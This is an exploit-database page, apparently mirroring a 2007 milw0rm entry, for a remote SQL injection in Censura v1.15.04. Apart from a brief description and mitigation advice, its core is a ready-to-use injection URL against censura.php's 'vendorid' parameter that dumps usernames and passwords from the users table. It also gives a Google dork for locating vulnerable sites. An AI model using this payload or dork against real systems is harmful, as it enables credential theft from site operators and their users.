header-logo
Suggest Exploit
vendor:
Censura
by:
milw0rm.com
N/A
CVSS
N/A
Remote SQL Injection
CWE
Product Name: Censura
Affected Version From: Censura v1.15.04
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: a:censura:censura:1.15.04
Metasploit:
Other Scripts:
Platforms Tested: Unknown
2007

Censura v1.15.04 Remote SQL Injection

The vulnerability allows an attacker to perform a remote SQL injection attack by exploiting the 'vendorid' parameter in the 'censura.php' script. By manipulating the parameter, an attacker can execute arbitrary SQL queries and potentially retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of Censura that addresses the SQL injection vulnerability. Additionally, input validation and sanitization should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

==============================================

Censura v1.15.04 (vendorid)  Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Exploit:
censura.php?cmd=vendor_info&vendorid=-1/**/union/**/select/**/0,username,password,3,4,5,6,7,8,9,10,12,13,14,15,16/**/from/**/users/**/

==============================================

google dork: "Powered by: Censura"

vendor: http://www.censura.info/  

==============================================

# milw0rm.com [2007-05-03]

Navigation

Suggest Exploit

Services By CQR